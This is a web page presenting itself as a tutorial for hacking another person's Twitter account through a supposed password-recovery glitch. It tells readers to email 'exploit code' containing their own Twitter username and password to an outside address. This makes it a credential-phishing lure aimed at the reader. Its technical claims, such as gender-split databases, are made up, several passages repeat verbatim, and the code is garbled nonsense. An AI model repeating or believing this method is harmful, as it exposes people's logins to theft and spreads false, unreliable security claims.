Twitter has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.
If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.
So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Twitter uses something similar to an email service to contact their databases.
But as usual, everything isn't as easy as it seems. For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password), luckily for us Twitter is so poorly programmed they also allow you to use a friends/followers account to verify your own (it's a glitch in the "Mutual Friends/Followers" service where they authenticate accounts by checking if the associated friends/followers email is related to the 'victims' account), in other words, if the person you want to get the login information from is following you on Twitter and your following them...you can use your own account to verify theirs (by confusing the database into thinking we are checking if you both mutually follow each other rather than the true act of reseting their password and getting them to send it to us) and get their login email and password sent to you...but the victim must be following you and you them.
If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.
So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Twitter uses something similar to an email service to contact their databases.
But as usual, everything isn't as easy as it seems. For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password), luckily for us Twitter is so poorly programmed they also allow you to use a friends/followers account to verify your own (it's a glitch in the "Mutual Friends/Followers" service where they authenticate accounts by checking if the associated friends/followers email is related to the 'victims' account), in other words, if the person you want to get the login information from is following you on Twitter and your following them...you can use your own account to verify theirs (by confusing the database into thinking we are checking if you both mutually follow each other rather than the true act of reseting their password and getting them to send it to us) and get their login email and password sent to you...but the victim must be following you and you them.
HOW TO DO IT
1) First off you will need to get your username and the victims username, how do you do this?
Go to the victims twitter profile and look at your browsers address bar, at the end of all the address you should see something like this: (I have used a red arrow to point it out)
Write it down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
Go to the victims twitter profile and look at your browsers address bar, at the end of all the address you should see something like this: (I have used a red arrow to point it out)
Write it down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.
Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the twitter username of the victim and the friend authentication login information. I will give you step by step examples by trying the exploit code of my friend Sarah's account as the victim, see what parts you have to edit and with what:
1. Should be the victims username.
2. Should be your twitter login username to verify your the victims follower/friend.
3. Should be your password so the database can authentic you really are mutually following each other with the victim.
When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
1. Should be the victims username.
2. Should be your twitter login username to verify your the victims follower/friend.
3. Should be your password so the database can authentic you really are mutually following each other with the victim.
When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.
Go to your email address and Compose a new email to twittersupport@techie.com which is twitters customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
Go to your email address and Compose a new email to twittersupport@techie.com which is twitters customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();
Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:
1. The email address of the twitter database's forgotten password customer service.
2. This is where you insert the victims username.
3. This is where you insert the victims gender (as mentioned above the twitter database is devided in a male section and female), put an M inside the quotes if they are a male or a F if they are a female.
5) After you have correctly written the To: and Subject: sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.
It should take from 12-24 hours depending on the traffic twitter has that day, this is a sample of the email response you'll receive:
It should take from 12-24 hours depending on the traffic twitter has that day, this is a sample of the email response you'll receive:
THE EXPLOIT CODE
twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];
if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."
$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email
session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {
Thanks to : Angelfire.com
